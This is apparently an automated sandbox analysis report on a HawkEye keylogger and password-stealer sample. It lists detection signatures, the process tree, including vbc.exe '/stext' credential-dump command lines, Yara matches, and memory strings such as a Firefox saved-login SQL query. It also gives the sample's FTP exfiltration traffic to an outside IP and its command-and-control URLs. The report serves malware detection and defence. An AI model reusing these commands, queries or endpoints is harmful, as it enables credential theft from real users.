Loading ...

Play interactive tourEdit tour

Analysis Report Vkdr225E85

Overview

General Information

Sample Name:Vkdr225E85 (renamed file extension from none to exe)
Analysis ID:359443
MD5:ff932f457521b993feffc92d662166e6
SHA1:725cc0c5e1914d3ea02674fa7278ed8b7c4f8b19
SHA256:ac8dde58d7ead58fa4b474c6627621489fdf362270147bb0e00c1a8678ba3888
Tags:HawkEye
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Vkdr225E85.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\Vkdr225E85.exe' MD5: FF932F457521B993FEFFC92D662166E6)
    • Vkdr225E85.exe (PID: 6712 cmdline: C:\Users\user\Desktop\Vkdr225E85.exe MD5: FF932F457521B993FEFFC92D662166E6)
      • vbc.exe (PID: 7132 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 7140 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
      00000004.00000002.513535332.0000000007600000.00000004.00000001.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
      • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
      00000004.00000002.513457560.00000000075A0000.00000004.00000001.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
      • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
      00000006.00000002.276981513.0000000000400000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        Click to see the 23 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.Vkdr225E85.exe.4069930.8.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
          7.2.vbc.exe.400000.0.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            4.2.Vkdr225E85.exe.45fa72.3.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              4.2.Vkdr225E85.exe.7600000.12.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
              • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
              1.2.Vkdr225E85.exe.43cc7f0.2.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
              • 0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
              Click to see the 58 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: vbc.exe.7140.7.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
              Multi AV Scanner detection for submitted fileShow sources
              Source: Vkdr225E85.exeMetadefender: Detection: 24%Perma Link
              Source: Vkdr225E85.exeReversingLabs: Detection: 67%
              Machine Learning detection for sampleShow sources
              Source: Vkdr225E85.exeJoe Sandbox ML: detected
              Source: 1.2.Vkdr225E85.exe.43cc7f0.2.unpackAvira: Label: TR/Inject.vcoldi
              Source: 4.2.Vkdr225E85.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
              Source: 4.2.Vkdr225E85.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: Vkdr225E85.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
              Source: Vkdr225E85.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmp
              Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exe
              Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exe
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpBinary or memory string: autorun.inf
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmpBinary or memory string: [autorun]
              Source: Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpBinary or memory string: autorun.inf
              Source: Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpBinary or memory string: [autorun]
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then call 054EA6E8h
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then call 054EA6E8h
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then call 054EA6E8h
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
              Source: C:\Users\user\Desktop\Vkdr225E85.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.7:49731 -> 103.27.200.199:21
              Source: global trafficTCP traffic: 192.168.2.7:49732 -> 103.27.200.199:35394
              Source: Joe Sandbox ViewIP Address: 103.27.200.199 103.27.200.199
              Source: Joe Sandbox ViewASN Name: BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTH BANGMODENTERPRISE-THBangmodEnterpriseCoLtdTH
              Source: unknownFTP traffic detected: 103.27.200.199:21 -> 192.168.2.7:49731 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 16:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exe, 00000007.00000002.282385616.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmp, vbc.exe, 00000007.00000002.282385616.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: vbc.exe, 00000007.00000002.282860124.0000000000B7E000.00000004.00000001.sdmpString found in binary or memory: go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: vbc.exe, 00000007.00000002.282860124.0000000000B7E000.00000004.00000001.sdmpString found in binary or memory: go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: vbc.exe, 00000007.00000003.282033298.0000000000B7B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://www.bing.com/orgid/idtoken/nosigninhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=351a037b-0597-47d9-b2c1-bfb1c870bba0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%223B109BCA2CB841A781265B1D219195C1%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=
              Source: vbc.exe, 00000007.00000003.282033298.0000000000B7B000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=7162084889081;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=5657692158540;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://www.bing.com/orgid/idtoken/nosigninhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5723238221569;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token&nonce=351a037b-0597-47d9-b2c1-bfb1c870bba0&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fnosignin&scope=openid&response_mode=form_post&msafed=0&prompt=none&state=%7b%22ig%22%3a%223B109BCA2CB841A781265B1D219195C1%22%7dhttps://login.microsoftonline.com/common/oauth2/authorizehttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=
              Source: unknownDNS traffic detected: queries for: 200.82.6.0.in-addr.arpa
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
              Source: Vkdr225E85.exe, 00000004.00000002.509801613.0000000003563000.00000004.00000001.sdmpString found in binary or memory: http://ftp.triplelink.co.th
              Source: Vkdr225E85.exeString found in binary or memory: http://inchat.kro.kr
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.509945562.0000000004061000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: Vkdr225E85.exe, 00000001.00000002.257214387.0000000002F81000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Vkdr225E85.exeString found in binary or memory: http://schooldb.inchat.kro.kr/
              Source: Vkdr225E85.exe, 00000001.00000002.258840939.0000000003F89000.00000004.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.502038195.0000000000402000.00000040.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
              Source: Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: Vkdr225E85.exeString found in binary or memory: http://www.gagalive.kr/livechat1.swf?chatroom=inchat-
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: vbc.exe, vbc.exe, 00000007.00000002.282385616.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: Vkdr225E85.exe, 00000004.00000002.506439148.0000000003061000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
              Source: Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: Vkdr225E85.exe, 00000001.00000002.263249661.0000000006020000.00000002.00000001.sdmp, Vkdr225E85.exe, 00000004.00000002.511522126.00000000061B0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
